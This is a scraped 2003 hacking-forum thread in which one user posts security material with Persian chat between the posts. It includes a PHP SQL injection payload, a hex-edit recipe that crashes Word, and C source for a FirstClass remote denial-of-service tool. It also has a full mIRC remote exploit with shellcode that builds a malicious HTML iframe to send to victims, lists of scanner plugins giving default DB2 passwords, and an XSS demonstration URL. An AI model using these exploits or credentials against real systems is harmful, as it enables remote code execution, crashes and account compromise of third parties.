$pwd1 = md5($pwd);
}
if($pass == $pwd1) {
$admin = base64_encode("$aid:$pwd1");
setcookie("admin", "$admin", time()+2592000, "", "", ""); // 1 mo is 2592000
}
}
}

As you can see $aid is not checked. Therefore, you can run the query like:
select pwd from mpn_authors where aid='mad' into outfile '/filepath/file.txt'

When you enter:
aid=mad' into outfile '/filepath/file.txt

Workaround:
This vulnerability will not work if magic_quotes_gpc is set to on.

Fix:
Find the line:
if ((isset($aid)) && (isset($pwd)) && ($op == "login")) {
if($aid!="" AND $pwd!="") {

And add to it:
$aid=addslashes($aid);

NI3

10-08-2003, 03:36 PM

inam bad nis
---
The following steps can be performed in order to create a proof of
concept Word document:

��

1. Open Word.
2. Save .doc file.
3. Modify .doc file by using binary editor as follows:

these lines were taken from .doc file of Microsoft Word 2002(10.2627.3311):

00 00 00 00 00 a3 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 01
00 00 00 00 00 00 b4 01 00 00 20 00 00 00 9c 01 00 00 00 00 00 00 9c
01 00 00 00 00 00 00 9c 01 00 00 00 00 00 00 9c 01 00 00 00 00 00 00
-------

4. Change them as follows:

00 00 00 00 00 a3 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 01
00 00 62 62 62 62 b4 01 00 00 20 00 00 00 9c 01 00 00 00 00 00 00 9c
01 00 00 00 00 00 00 9c 01 00 00 00 00 00 00 9c 01 00 00 00 00 00 00
-------

5. Open modified .doc file.
6. Microsoft Word will crashes.

---
age yeki remotesh kone tope

NI3

10-08-2003, 03:49 PM

hi
---
#include <windows.h>
#include <winsock.h>
#pragma comment (lib,"wsock32.lib")

��

#define PerfectOverwrite 246

void main (int argc, char *argv[])
{

int len;
SOCKET sock1;
SOCKADDR_IN sin;
char *sav;

WSADATA wsadata;
WORD wVersionRequested = MAKEWORD (2,0);

printf ("- FirsClass Internet Services Remote DoS -\n\n"
"Discovered & coded by I2S-LAB\n"
" [Only registered and activated users can see links]");

if (!argv[1])
{
printf ("Usage : %s <IP Address>\n", argv[0]);
ExitProcess (0);
}

if (WSAStartup(wVersionRequested, &wsadata) ) ExitProcess (0);

if (!(sav = (char *) LocalAlloc (LPTR, 20 + PerfectOverwrite)) )
{
printf ("Error ! cannot allocate enough memory.\n");
ExitProcess (0);
};

lstrcat (sav, "GET / [Only registered and activated users can see links]");
memset (&sav[14], 'A', PerfectOverwrite - 4);
lstrcat (sav,"DDDD\r\n\r\n");

sin.sin_family = AF_INET;
sin.sin_port = htons (80);

if ( (sin.sin_addr.s_addr=inet_addr (argv[1])) == INADDR_NONE)
{
printf ("Incorrect IP Address : %s\n", argv[1]);
ExitProcess(0);
}

sock1 = socket (AF_INET, SOCK_STREAM, 0);

printf ("\nconnecting to %s...", argv[1]);

if ( connect (sock1,(SOCKADDR *)&sin, sizeof (sin)) == SOCKET_ERROR )
printf ("connection failed!\n");

else
{
printf ("ok!\nSending crafted request...");

send (sock1,sav, PerfectOverwrite + 18,0);
puts ("ok!");
}

closesocket (sock1);
}

---

NI3

10-08-2003, 04:02 PM

--
#include <windows.h>
#include <commctrl.h>
#include <stdio.h>
char tWindow[]="Windows Task Manager";// The name of the main window
char* pWindow;
int main(int argc, char *argv[])
{
long hWnd,proc;
DWORD hThread;
printf("%% AppShutdown - Playing with PostThreadMessage\n");
printf("%% [Only registered and activated users can see links]\n\n");
// Specify Window Title On Command Line
if (argc ==2)
pWindow = argv[1];
else
pWindow = tWindow;

��

printf("+ Finding %s Window...\n",pWindow);
hWnd = (long)FindWindow(NULL,pWindow);
if(hWnd == NULL)
{
printf("+ Couldn't Find %s Window\n",pWindow);
return 0;
}
printf("+ Found Main Window At...0x%xh\n",hWnd);
printf("+ Finding Window Thread..");
hThread = GetWindowThreadProcessId(hWnd,&proc);
if(hThread == NULL)
{
printf("Failed\n");
return 0;
}
printf("0x%xh Process 0x%xh\n",hThread,proc);
printf("+ Send Quit Message\n");
PostThreadMessage((DWORD) hThread,(UINT) WM_QUIT,0,0);
printf("+ Done...\n");
return 0;
}

--

NI3

10-09-2003, 05:48 PM

bache ha faghat hal konid :d
----\Title: Default password (db2fenc1) for db2fenc1
ID: 11860 Risk Level: High
Category: Default Unix Accounts
URL: [Only registered and activated users can see links]
Summary: Logs into the remote host

---------------------------------------------------------------
Title: Default password (ibmdb2) for db2as
ID: 11863 Risk Level: High
Category: Default Unix Accounts
URL: [Only registered and activated users can see links]
Summary: Logs into the remote host

---------------------------------------------------------------
Title: Default password (ibmdb2) for db2fenc1
ID: 11861 Risk Level: High
Category: Default Unix Accounts
URL: [Only registered and activated users can see links]
Summary: Logs into the remote host

---------------------------------------------------------------
Title: Default password (db2inst1) for db2inst1
ID: 11862 Risk Level: High
Category: Default Unix Accounts
URL: [Only registered and activated users can see links]
Summary: Logs into the remote host

---------------------------------------------------------------
Title: Default password (ibmdb2) for db2inst1
ID: 11859 Risk Level: High
Category: Default Unix Accounts
URL: [Only registered and activated users can see links]
Summary: Logs into the remote host

---------------------------------------------------------------
Title: Default password (db2as) for db2as
ID: 11864 Risk Level: High
Category: Default Unix Accounts
URL: [Only registered and activated users can see links]
Summary: Logs into the remote host

---------------------------------------------------------------
Title: SOCKS server detection
ID: 11865 Risk Level: Other
Category: Misc.
URL: [Only registered and activated users can see links]
Summary: Detect & inspect SOCKS4/5 servers

---------------------------------------------------------------
Title: RemoteNC detection
ID: 11855 Risk Level: High
Category: Backdoors
URL: [Only registered and activated users can see links]
Summary: Determines the presence of RemoteNC

---------------------------------------------------------------
Title: Apache < 2.0.48
ID: 11853 Risk Level: Low
Category: Misc.
URL: [Only registered and activated users can see links]
Summary: Checks for version of Apache

---------------------------------------------------------------
Title: Cafe Wordpress SQL injection
ID: 11866 Risk Level: High
Category: CGI abuses
URL: [Only registered and activated users can see links]
Summary: Checks for the presence of cafe wordpress

---------------------------------------------------------------
Title: FsSniffer Detection
ID: 11854 Risk Level: High
Category: Backdoors
URL: [Only registered and activated users can see links]
Summary: Determines the presence of FsSniffer

---------------------------------------------------------------
Title: BIND Buffer overflows in the DNS stub resolver library
ID: 11857 Risk Level: High
Category: Gain root remotely
URL: [Only registered and activated users can see links]
Summary: Checks that BIND is not version 4.9.2 through 4.9.10

---------------------------------------------------------------
Title: iPlanet unauthorized sensitive data retrieval
ID: 11856 Risk Level: High
Category: Gain root remotely
URL: [Only registered and activated users can see links]
Summary: Check for vulnerable version of iPlanet Webserver

---------------------------------------------------------------
Title: TTL Anomaly detection
ID: 11858 Risk Level: Low
Category: General
URL: [Only registered and activated users can see links]
Summary: Check for TTL anomalies on the remote host

NI3

10-09-2003, 06:09 PM

salam baro bach man chan ja ino didam bara hamin to ye txt file mizaramesh (3 ta maghalast) behtar az ine ke joda bashe
:*
bye
---

[Only registered and activated users can see links]
[Only registered and activated users can see links]

-----------
rasti ino hatman lazem darid:

NI3

10-09-2003, 06:40 PM

Official: crackers have broken into GPRS billing
:[Only registered and activated users can see links]

----
Cisco warns its WLAN security can be cracked
:[Only registered and activated users can see links]
----
Trojan program uses Internet Explorer hole to hijack browsers
:[Only registered and activated users can see links]
------
[Only registered and activated users can see links]

NI3

10-15-2003, 04:30 PM

bad az 1 hafte bargashtam:D
----

NI3

10-15-2003, 04:32 PM

try this

NI3

10-16-2003, 01:36 PM

7 vulnerability
---

Title: WinSyslog (DoS)
ID: 11884 Risk Level: High
Category: Denial of Service
URL: [Only registered and activated users can see links]
Summary: Attempts to crash the remote host

---------------------------------------------------------------
Title: Buffer Overflow in Windows Troubleshooter ActiveX Control (826232)
ID: 11887 Risk Level: High
Category: Windows
URL: [Only registered and activated users can see links]
Summary: Checks for hotfix Q826232

---------------------------------------------------------------
Title: Vulnerability in Authenticode Verification Could Allow Remote Code
Execution (823182)
ID: 11886 Risk Level: High
Category: Windows
URL: [Only registered and activated users can see links]
Summary: Checks for hotfix Q823182

---------------------------------------------------------------
Title: Buffer Overrun in Messenger Service (828035)
ID: 11888 Risk Level: High
Category: Windows
URL: [Only registered and activated users can see links]
Summary: Checks for hotfix Q828035

---------------------------------------------------------------
Title: AOL Instant Messenger is Installed
ID: 11882 Risk Level: Low
Category: Windows
URL: [Only registered and activated users can see links]
Summary: Determines if AOL Instant Messenger is installed

---------------------------------------------------------------
Title: Gator/GAIN Spyware Installed
ID: 11883 Risk Level: Other
Category: Windows
URL: [Only registered and activated users can see links]
Summary: Determines if Gator Spyware is installed

---------------------------------------------------------------
Title: Buffer Overrun in the ListBox and in the ComboBox (824141)
ID: 11885 Risk Level: Other
Category: Windows
URL: [Only registered and activated users can see links]
Summary: Checks for hotfix Q824141

NI3

10-16-2003, 01:56 PM

Title: myPHPcalendar injection
ID: 11877 Risk Level: High
Category: CGI abuses
URL: [Only registered and activated users can see links]
Summary: Checks for the presence of contacts.php

---------------------------------------------------------------
Title: OpenSSL overflow via invalid certificate passing
ID: 11875 Risk Level: High
Category: Gain a shell remotely
URL: [Only registered and activated users can see links]
Summary: Checks for the behavior of SSL

---------------------------------------------------------------
Title: gallery code injection (2)
ID: 11876 Risk Level: High
Category: CGI abuses
URL: [Only registered and activated users can see links]
Summary: Checks for the presence of setup/index.php

---------------------------------------------------------------
Title: Fluxay Sensor Detection
ID: 11880 Risk Level: High
Category: Backdoors
URL: [Only registered and activated users can see links]
Summary: Determines the presence of Fluxay Sensor

---------------------------------------------------------------
Title: IIS Service Pack - 404
ID: 11874 Risk Level: High
Category: CGI abuses
URL: [Only registered and activated users can see links]
Summary: IIS Service Pack Check

---------------------------------------------------------------
Title: Compaq Web-based Management Login
ID: 11879 Risk Level: High
Category: General
URL: [Only registered and activated users can see links]
Summary: Checks Compaq Web-based Management Agent for Default Administrator
Password

---------------------------------------------------------------
Title: Buffer Overrun In HTML Converter Could Allow Code Execution (823559)
ID: 11878 Risk Level: High
Category: Windows
URL: [Only registered and activated users can see links]
Summary: Checks for hotfix Q823559

---------------------------------------------------------------
Title: SMB Registry : permissions of the Microsoft Transaction Server key
ID: 11867 Risk Level: High
Category: Windows
URL: [Only registered and activated users can see links]
Summary: Determines the access rights of a remote key

---------------------------------------------------------------
Title: Find if IIS server allows BASIC and/or NTLM authentication
ID: 11871 Risk Level: Low
Category: Misc.
URL: [Only registered and activated users can see links]
Summary: Find IIS authentication scheme

---------------------------------------------------------------
Title: Wollf backdoor detection
ID: 11881 Risk Level: High
Category: Backdoors
URL: [Only registered and activated users can see links]
Summary: Determines the presence of Wollf

---------------------------------------------------------------
Title: Microsoft's SQL version less than or equal to 7
ID: 11870 Risk Level: High
Category: Windows
URL: [Only registered and activated users can see links]
Summary: Microsoft SQL less than or equal to 7 may be misconfigured

---------------------------------------------------------------
Title: SMB Registry : permissions of the SNMP key
ID: 11868 Risk Level: High
Category: Windows
URL: [Only registered and activated users can see links]
Summary: Determines the access rights of a remote key

---------------------------------------------------------------
Title: ODBC tools check
ID: 11872 Risk Level: High
Category: CGI abuses
URL: [Only registered and activated users can see links]
Summary: Checks for the presence of ODBC tools

---------------------------------------------------------------
Title: PayPal Store Front code injection
ID: 11873 Risk Level: High
Category: CGI abuses
URL: [Only registered and activated users can see links]
Summary: Checks for the presence of index.php

NI3

10-22-2003, 04:00 PM

it seems to be mirc exploit
-----
** remote mirc < 6.11 exploit by blasty
**
** TESTED ON: Windows XP (No SP, Ducth) Build: 2600.xpclient.010817-1148
**
** A few days ago, I saw a mIRC advisory on packetstorm [1] and was surprised
** nobody had written an exploit yet. So I decided to start writing one.
** Since this was my first time coding a exploit for windows, it took some
** research before I got the hang of it. (Ollydbg is much more confusing then GDB btw )
**
** This exploits (ab)uses the bug in irc:// URI handling. It contains a buffer-
** overflow, and when more then 998 bytes are given EIP will be overwritten.
**
** At first I was thinking of a simple solution to get this exploitable. Since
** giving an URI with > 998 chars to someone on IRC is simply NOT done
** Then I remember the iframe-irc:// flaw found by uuuppzz [2]
**
** This exploit will write an malicious HTML file containing an iframe executing the
** irc:// address. So you can give this to anyone on IRC for example
** The shellcode included does only execute cmd.exe, because I don't want to be this
** a scriptkiddy util. But, replacing the shellcode with your own is also possible.
** An 400 bytes shellcode (bindshell etc.) easily fits in the buffer, but it may require
** some tweaking.
** After exiting the cmd.exe mIRC will crash, so shellcode its not 100% clean, but who carez
**
** Oh yeah, I almost forgot.. this exploit also works even if mIRC isn't started.
** mIRC will start automatically when an irc:// is executed, so you can also send somebody
** and HTML email containing the evil HTML code. (only for poor clients like Outlook Express )
**
**/

#include <stdio.h>

/* Stupid cmd.exe exec shellcode. hey! I r !evil */
unsigned char shellcode[] =
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x8b\xec\x55\x8b\xec\x68\x65\x78\x65\x20\x68\x63\x 6d\x64\x2e\x8d\x45\xf8\x50\xb8"
"\x44\x80\xbf\x77" // 0x78bf8044 <- adress of system()
"\xff\xd0"; // call system()

char jmpback[] =
"\xE9\xCF\xFB\xFF\xFF"; // my leet negative JMP shellcode

char buffer[1100], fstring[1300]; // heh, need to clean this up

int main(int argc, char *argv[]) {
FILE *evil;

fprintf(stdout, "---------------------------------------------\n"
"mIRC < 6.11 remote exploit by [Only registered and activated users can see links]\n"
"Exploit downloaded on [Only registered and activated users can see links]"
"---------------------------------------------\n\n");

// NOPslides are cool
memset(buffer, 0x90, sizeof(buffer) - 1);

// place shellcode in buffer
memcpy(buffer + 20, shellcode, strlen(shellcode));

// took this one from ntdll.dll (jmp esp)
*(long *)&buffer[994] = 0x77F4801C;

// place jmpback shellcode in buffer
memcpy(buffer + 20 + strlen(shellcode) + 1010, jmpback, strlen(jmpback));

printf("[+] Evil buffer constructed\n");

// open HTML file for writing
if((evil = fopen("index.html", "a+")) != NULL) {

// construct evil string
sprintf(fstring, "<iframe src=\"irc://%s\"></iframe>", buffer);

// write string to file
fputs(fstring, evil);

// close file
fclose(evil);

printf("[+] Evil HTML file written!\n");
return(0);
} else {
// uh oh.. :/
fprintf(stderr, "ERROR: Could not open index.html for writing!\n");
exit(1);
}
}

------------

NI3

10-22-2003, 04:07 PM

Title: nibindd is running
ID: 11899 Risk Level: Medium
Category: RPC
URL: [Only registered and activated users can see links]
Summary: Connects to the remote nibindd RPC service

---------------------------------------------------------------
Title: Obtain /etc/passwd using NetInfo
ID: 11898 Risk Level: Other
Category: General
URL: [Only registered and activated users can see links]
Summary: Uses NetInfo to read /etc/passwd remotely

---------------------------------------------------------------
Title: Opera web browser HREF overflow
ID: 11900 Risk Level: High
Category: Windows
URL: [Only registered and activated users can see links]
Summary: Determines the version of Opera.exe

---------------------------------------------------------------
Title: DB2 discovery service DOS
ID: 11896 Risk Level: Low
Category: Denial of Service
URL: [Only registered and activated users can see links]
Summary: A too long UDP packet kills the remote service

---------------------------------------------------------------
Title: NetInfo daemon
ID: 11897 Risk Level: Medium
Category: General
URL: [Only registered and activated users can see links]
Summary: Checks for the presence of NetInfo
-----------------------------------------------
Title: LinkSys EtherFast Router Denial of Service Attack
ID: 11891 Risk Level: High
Category: Denial of Service
URL: [Only registered and activated users can see links]
Summary: URL results in DoS of Linksys router

---------------------------------------------------------------
Title: TinyWeb 1.9
ID: 11894 Risk Level: High
Category: Misc.
URL: [Only registered and activated users can see links]
Summary: Checks for version of TinyWeb

---------------------------------------------------------------
Title: Gnu Cfserv remote buffer overflow
ID: 11893 Risk Level: High
Category: Gain root remotely
URL: [Only registered and activated users can see links]
Summary: Checks for the Cfserver remote buffer overflow

---------------------------------------------------------------
Title: Buffer Overrun in Messenger Service (real test)
ID: 11890 Risk Level: High
Category: Windows
URL: [Only registered and activated users can see links]
Summary: Checks for hotfix Q828035

---------------------------------------------------------------
Title: SCO OpenServer multiple vulnerabilities
ID: 11895 Risk Level: High
Category: General
URL: [Only registered and activated users can see links]
Summary: Checks the remote SCO OpenServer

---------------------------------------------------------------
Title: Exchange XEXCH50 Remote Buffer Overflow
ID: 11889 Risk Level: High
Category: SMTP problems
URL: [Only registered and activated users can see links]
Summary: Tests to see if authentication is required for the XEXCH50 command

---------------------------------------------------------------
Title: Citrix redirection bug
ID: 11892 Risk Level: Medium
Category: Windows
URL: [Only registered and activated users can see links]
Summary: Citrix Redirection detection

NI3

10-22-2003, 04:13 PM

Windows RPC2 Universal Exploit (MS03-039) & Remote DoS (RPC3)

/* Windows RPC2 Universal Exploit (MS03-039) & Remote DoS (RPC3) */
/* Must be used with the associated shell */
/* [Only registered and activated users can see links] */
/* */
/* This exploit works against unpatched systems (MS03-039) */
/* And cause a Denial of Service on patched systems (rpc3) */

NI3

10-22-2003, 04:18 PM

Cross-Site Java breaks Sandbox Isolation for Unsigned Applets
Date: 2003-10-21

Security-Corporation ID : SC-0715
URL : [Only registered and activated users can see links]
Author : Marc Schoenefeld <[Only registered and activated users can see links]>
Product : Java Plugin

---

NI3

10-22-2003, 04:24 PM

man ino didam nazar bedin:
----
ie-cache-script-injection (12961) Medium Risk

Microsoft Internet Explorer browser cache script injection
Description:

Microsoft Internet Explorer versions 5.0.1, 5.5, and 6.0 could allow a remote attacker to execute script on a victim's computer, caused by a vulnerability when Internet Explorer checks for the existence of local files in the browser's cache. A remote attacker could create a malicious Web page that would allow the attacker to bypass the cross-domain security model. This could allow an attacker to cause the execution of malicious script within the victim's "My Computer" security zone, once the page is visited.

Platforms Affected:
Microsoft Internet Explorer 5.01
Microsoft Internet Explorer 5.5
Microsoft Internet Explorer 6.0
Windows Any version

NI3

10-22-2003, 04:26 PM

Vivisimo Clustering Engine Input Validation Flaw Permits Remote Cross-Site Scripting Attacks

[Only registered and activated users can see links]

-------------------------------------------

SecurityTracker Alert ID: 1007955
CVE Reference: GENERIC-MAP-NOMATCH (Links to External Site)
Date: Oct 18 2003

Impact: Disclosure of authentication information, Disclosure of user information, Execution of arbitrary code via network, Modification of user information

Exploit Included: Yes

Description: ComSec of governmentsecurity.org reported an input validation vulnerability in the Vivisimo Clustering Engine. A remote user can conduct cross-site scripting attacks.

It is reported that the Clustering Engine does not ****** HTML code from user-supplied input before displaying the input as part of a search query results. A remote user can create a specially crafted URL that, when loaded by a target user, will cause arbitrary scripting code to be executed by the target user's browser. The code will originate from the site running the Clustering Engine software and will run in the security context of that site. As a result, the code will be able to access the target user's cookies (including authentication cookies), if any, associated with the site, access data recently submitted by the target user via web form to the site, or take actions on the site acting as the target user.

A demonstration exploit URL is provided:

[Only registered and activated users can see links][target]/search?query=<script>alert("Hello" )</script><script>alert("goodbye")</script>

Impact: A remote user can access the target user's cookies (including authentication cookies), if any, associated with the site running the Clustering Engine, access data recently submitted by the target user via web form to the site, or take actions on the site acting as the target user.

Solution: No solution was available at the time of this entry.

Vendor URL: [Only registered and activated users can see links] (Links to External Site)

Cause: Input validation error

Underlying OS: Linux (Any), UNIX (Any), Windows (Any)

Reported By: ComSec
Message History: None.

Vendor...now informed